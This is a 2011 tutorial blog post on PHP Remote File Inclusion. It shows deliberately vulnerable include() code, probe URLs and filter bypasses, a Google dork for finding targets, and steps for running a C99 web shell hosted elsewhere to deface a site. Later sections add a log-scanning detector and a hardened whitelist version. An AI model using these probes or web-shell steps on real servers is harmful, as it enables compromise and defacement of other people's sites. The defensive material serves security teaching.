Monday, September 5, 2011

Remote File Inclusion (RFI)

What is Remote File Inclusion?

Remote File Inclusion is a vulnerability found in web applications. It lets an attacker make the server include and execute a file (script) fetched from a location the attacker controls, which usually ends in a compromise of the whole web server. It occurs when user input is passed to a file-inclusion function without proper validation. In this tutorial I will explain how the attack is performed and how to avoid or counter it.
I am using PHP to explain RFI, firstly because it is the most widely used language for this kind of site and secondly because I am most comfortable in it ;). The concept of RFI stays the same in any language that can include code from a path built out of user input.


Understanding RFI:
Before we start we must be familiar with PHP's include() and its relatives (require(), include_once(), require_once()). These functions load another file and execute it as PHP inside the current page. Let's look at a simple example to get a clear idea of how they work, and of how they go wrong. See the code below.
This is index.php (exploitable code):

<?php
if (isset($_GET['page']))       // true only when a ?page= value was supplied
{
    $page = $_GET['page'];      // the page to display, taken straight from the URL, unvalidated
    include($page . ".php");    // loads and executes whatever $page points at: this is the bug
}
else
{
?>
<html>
<h1>This is an example for RFI</h1>
click here for <a href="/index.php?page=rfi1">RFI1</a><br/>
click here for <a href="/index.php?page=rfi2">RFI2</a>
</html>
<?php
}
?>
If you understand the above code, skip the explanation part.

Explanation:
Let's say the URL of this page is www.mysite.com/index.php.
directory structure:
--mysite.com
     |--index.php
     |--rfi1.php
     |--rfi2.php
You may be wondering what happens if you open this URL in a browser for the first time. The answer is the page shown in the screenshot below.

[Screenshot in the original post: the plain HTML page with the heading "This is an example for RFI" and the two links RFI1 and RFI2.]
Now you may be wondering what happened to the PHP code written in the first few lines.
Let's see: isset($_GET['page']) returns true only if the request carried a "page" query parameter with some value. When you open the bare URL there is no such parameter, so isset() returns false and you see the else branch, which is the plain HTML. So where does the value come from? From the links inside the HTML block: index.php?page=rfi1. Clicking that link requests index.php again and passes the value "rfi1" in the page parameter, i.e. we are asking for another page of the same site. Now the "if" condition is satisfied, include() appends ".php" and pulls the contents of rfi1.php into the current page, and the URL changes to www.mysite.com/index.php?page=rfi1.


Finding Vulnerability:
The example I gave is clearly vulnerable. Let's see how. Suppose I request a page "rfi3"; we know there is no rfi3.php in the directory, so include() fails and PHP shows a warning something like the one below:

[Screenshot in the original post: a PHP warning from include() saying that rfi3.php could not be opened, followed by the full filesystem path of index.php, which is itself an information leak.]
If a website shows such an error, the user input is being passed to include() without filtering and the page is very likely vulnerable. If that example is confusing, here is the simplest test of whether a page is vulnerable or not: type www.mysite.com/index.php?page=http://google.com? and, if you get the Google page, it is clearly vulnerable. If you observed carefully, I put a "?" at the end of the URL. The reason is that the code does include($page.".php"): without the "?" the function would try to fetch "http://google.com.php", which does not exist; with it, the appended ".php" becomes part of the query string of the remote request ("http://google.com?.php") and the remote server simply ignores it.
Sometimes, to secure the website, the programmer checks whether the GET argument contains "http://" or "www" and refuses to include it if so. Such a blacklist is easily tricked: "HTtp://" or "WWw" passes a case-sensitive check, and so does any other stream wrapper PHP can include from, such as ftp://. A smarter programmer converts the whole value to lowercase before checking, but that still leaves the other wrappers and plain local paths such as ../../etc/passwd (local file inclusion, the same bug without a URL) untouched. This is why the countermeasures below rely on a whitelist rather than a blacklist.
Note: Sometimes you may get an error like "include(): http:// wrapper is disabled in the server configuration by allow_url_include=0". That means allow_url_include (and usually allow_url_fopen as well) is turned off in php.ini, and the remote variant of the attack is not possible on that server. The include() still takes a local path from the URL, though, so the page remains exposed to local file inclusion.


Use of Google Dorks To Find Vulnerability: Let's say you want to see whether any page of a website (say abc.com) is a candidate. Type:
site:abc.com inurl:?page=
in Google search. It returns the indexed pages of abc.com whose URL contains a page= parameter, i.e. pages that build their content from a URL parameter, which is exactly the pattern to test with the http://google.com? probe. See dorks to understand the operators. The dork only finds candidates; each one still has to be tested, so find out for yourself how to use it efficiently for RFI.


How to perform RFI Attack:
Okay, we found the vulnerability; now the question is how to get into the server. To deface a website we need a web shell, a PHP script such as the C99 shell, which works as a file explorer (much like Windows Explorer) and command runner for whichever server executes it. To get a feel for it, upload it to a free host such as my3gb.com and open the uploaded URL after signing out: you can still manage the files and folders of that account through the shell. So somehow we have to upload or run this "shell" inside the victim's server. If you can upload the script directly, do so and open the path where it was uploaded. Otherwise we use the vulnerable page to run it. First upload your shell script to a server you control, let's say at "abc.com/shell.txt". We have our vulnerable link www.mysite.com/index.php?page=, so now open www.mysite.com/index.php?page=http://abc.com/shell.txt? (with the trailing "?", for the same reason as before, otherwise include() asks abc.com for shell.txt.php) and the shell is running on the "mysite.com" server. You may wonder why I used "shell.txt" and not "shell.php". If the file were shell.php, the server at abc.com would execute it itself and hand mysite.com only the resulting HTML; served as .txt it is delivered as raw PHP source, which the victim's include() then executes.
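Seen from the defender's side, every step of the attack above leaves a request in the web server's access log. The script below is an added example, not part of the original post, that scans constructed Apache-style log lines for the probe URLs discussed on this page (the http://google.com? test, the case-mangled HTtp:// variant, the shell.txt include) and, going one step beyond the text, for the NUL byte (%00) and ../ payloads that aim at the same include() without a remote URL. The log lines, IP addresses and hostnames are made up for the example; it needs PHP 7.1 or later and runs from the command line.

```php
<?php
// Added example: flag remote/local file inclusion probes in a web server access log.
// The log below is constructed for this example (combined log format); it is not real traffic.
declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [05/Sep/2011:10:00:01 +0000] "GET /index.php?page=rfi1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Sep/2011:10:00:02 +0000] "GET /index.php?page=rfi3 HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Sep/2011:10:00:03 +0000] "GET /index.php?page=http://google.com? HTTP/1.1" 200 9021 "-" "curl/7.21.0"
198.51.100.7 - - [05/Sep/2011:10:00:04 +0000] "GET /index.php?page=HTtp%3A%2F%2Fabc.com%2Fshell.txt%3F HTTP/1.1" 200 48211 "-" "curl/7.21.0"
198.51.100.7 - - [05/Sep/2011:10:00:05 +0000] "GET /index.php?page=ftp://abc.com/shell.txt%00 HTTP/1.1" 500 0 "-" "curl/7.21.0"
198.51.100.7 - - [05/Sep/2011:10:00:06 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1800 "-" "curl/7.21.0"
192.0.2.9 - - [05/Sep/2011:10:00:07 +0000] "GET /search.php?q=see+http://example.com HTTP/1.1" 200 700 "-" "Mozilla/5.0"
LOG;

// Stream wrappers PHP's include() will open when allow_url_include / allow_url_fopen permit it.
const INCLUDE_WRAPPERS = ['http://', 'https://', 'ftp://', 'ftps://', 'php://', 'data:', 'expect://', 'phar://', 'file://'];

/**
 * Decide whether one decoded, lower-cased parameter value looks like an inclusion payload.
 * Only a value that STARTS with a wrapper counts: "q=see http://example.com" typed into a
 * search box is ordinary user text and must not be flagged.
 */
function classifyValue(string $value): ?string
{
    foreach (INCLUDE_WRAPPERS as $wrapper) {
        if (strncmp($value, $wrapper, strlen($wrapper)) === 0) {
            return "remote/wrapper inclusion via $wrapper";
        }
    }
    if (strpos($value, "\0") !== false) {
        return 'NUL byte (%00) to cut off the appended ".php"';
    }
    if (strpos($value, '../') !== false || strpos($value, '..\\') !== false) {
        return 'directory traversal (local file inclusion)';
    }
    return null;
}

/** Return one finding per suspicious query parameter: ip, time, path, param, decoded value, reason. */
function findInclusionProbes(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // client ip, timestamp and request target from a combined-format line
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+)/', $line, $m)) {
            continue;
        }
        [, $ip, $time, $target] = $m;
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue;                                   // no query string, nothing to inspect
        }
        foreach (explode('&', substr($target, $qpos + 1)) as $pair) {
            [$name, $raw] = array_pad(explode('=', $pair, 2), 2, '');
            // urldecode + strtolower collapses the "HTtp%3A%2F%2F" bypass back into "http://"
            $value  = strtolower(urldecode($raw));
            $reason = classifyValue($value);
            if ($reason !== null) {
                $findings[] = [
                    'ip' => $ip, 'time' => $time, 'path' => substr($target, 0, $qpos),
                    'param' => urldecode($name), 'value' => $value, 'reason' => $reason,
                ];
            }
        }
    }
    return $findings;
}

$findings = findInclusionProbes(SAMPLE_LOG);
foreach ($findings as $f) {
    printf("%-13s %s %s?%s=%s\n    -> %s\n",
        $f['ip'], $f['time'], $f['path'], $f['param'], addcslashes($f['value'], "\0"), $f['reason']);
}
// Group by source: one client walking through several payloads is the usual RFI signature.
$perIp = array_count_values(array_column($findings, 'ip'));
arsort($perIp);
foreach ($perIp as $ip => $n) {
    printf("%s: %d inclusion probe(s)\n", $ip, $n);
}
```

Run it with `php rfi_probes.php`. The rfi1 and rfi3 requests and the search query are left alone, while the four requests from the second client are reported with the reason each was flagged; in a real deployment you would feed it the live access log and alert on the per-source count rather than on a single hit, since the http://google.com? test on its own is exactly what a scanner sends to thousands of sites.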


Countermeasures:
1. Always set allow_url_include and allow_url_fopen to "Off" in php.ini unless they are really needed. allow_url_include is Off by default; allow_url_fopen is On by default and is used by code that reads remote URLs with fopen() or file_get_contents(), so check for that before turning it off.
2. Filter the input, but do not rely on a blacklist. Checking the GET argument for "http://" or "www" (after converting it to lowercase) catches the obvious probes but not ftp://, the other wrappers or ../ paths.
3. Use a whitelist: a switch/case or if/else chain that maps the allowed names to fixed file names, so the user's input never reaches include() as a path. Let's see how to modify the same code using IF-ELSE.

<?php
if (isset($_GET['page']))           // true only when a ?page= value was supplied
{
    if ($_GET['page'] === "rfi1")   // exact match against a fixed name; the input itself never becomes a path
    {
        include("rfi1.php");        // display the page rfi1
    }
    elseif ($_GET['page'] === "rfi2")
    {
        include("rfi2.php");        // display the page rfi2
    }
    else
    {
        // anything else goes back to index.php; a redirect rather than include("index.php"),
        // which would run this script again with the same bad ?page= and recurse forever
        header("Location: /index.php");
        exit;
    }
}
else
{
?>
<html>
<h1>This is an example for RFI</h1>
click here for <a href="/index.php?page=rfi1">RFI1</a><br/>
click here for <a href="/index.php?page=rfi2">RFI2</a>
</html>
<?php
}
?>
This code ensures that if none of the conditions is satisfied we go to the else part and return to index.php. Because the input is only ever compared against fixed names and never passed to include(), a value like http://abc.com/shell.txt? has nowhere to go.
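The if/else chain above hard-codes two names. The version below, an added example that is not the original post's code, generalises it into a whitelist array, adds a realpath() containment check as a second line of defence, and reports whether the php.ini switches from countermeasure 1 are actually off. It assumes the included pages live in a pages/ subdirectory next to index.php (pages/rfi1.php and pages/rfi2.php); the page names and links are the tutorial's own. It needs PHP 7.1 or later.

```php
<?php
// Hardened index.php (added example, not the original post's code).
// Assumed layout: this file plus pages/rfi1.php and pages/rfi2.php.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// Defence 1, the whitelist: user input selects a key; only our own file names ever reach include().
const ALLOWED_PAGES = [
    'rfi1' => 'rfi1.php',
    'rfi2' => 'rfi2.php',
];

/** Map the ?page= value to an absolute path inside PAGES_DIR, or null if it must be refused. */
function resolvePage($requested): ?string
{
    // ?page[]=x arrives as an array; anything that is not a plain string is refused
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;     // "rfi3", "http://google.com?", "../etc/passwd\0" all stop here
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;     // missing directory or file: fail closed instead of letting include() warn
    }
    // Defence 2: the resolved file must still sit under PAGES_DIR (guards against a whitelisted
    // name being replaced by a symlink that points somewhere else on the filesystem)
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

/** Countermeasure 1 from the text, checked at runtime: both remote-include switches must be off. */
function remoteIncludesDisabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)
        && !filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

if (PHP_SAPI === 'cli') {
    // Self-test: php index.php  (nothing is included; each payload is only resolved).
    // rfi1/rfi2 resolve once pages/rfi1.php and pages/rfi2.php exist; the rest is refused regardless.
    $probes = ['rfi1', 'rfi2', 'rfi3', 'http://google.com?', 'HTtp://abc.com/shell.txt?', "../../etc/passwd\0", ['rfi1']];
    foreach ($probes as $p) {
        $label = is_array($p) ? 'array (page[]=rfi1)' : addcslashes($p, "\0");
        printf("%-28s -> %s\n", $label, resolvePage($p) ?? 'refused');
    }
    printf("allow_url_include/allow_url_fopen both off: %s\n", remoteIncludesDisabled() ? 'yes' : 'NO, fix php.ini');
    exit;
}

if (!isset($_GET['page'])) {
    echo '<html><h1>This is an example for RFI</h1>',
         'click here for <a href="/index.php?page=rfi1">RFI1</a><br/>',
         'click here for <a href="/index.php?page=rfi2">RFI2</a></html>';
    exit;
}

$path = resolvePage($_GET['page']);
if ($path === null) {
    http_response_code(404);
    echo 'Unknown page';   // generic on purpose: echoing $page back invites XSS, and the PHP warning would leak the path
    exit;
}
include $path;
```

The whitelist is the real fix; the realpath() check and the ini_get() report cost nothing and catch the two ways this pattern usually degrades later: someone adds a file or symlink under pages/ that should not be there, or a server migration quietly turns allow_url_include back on.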
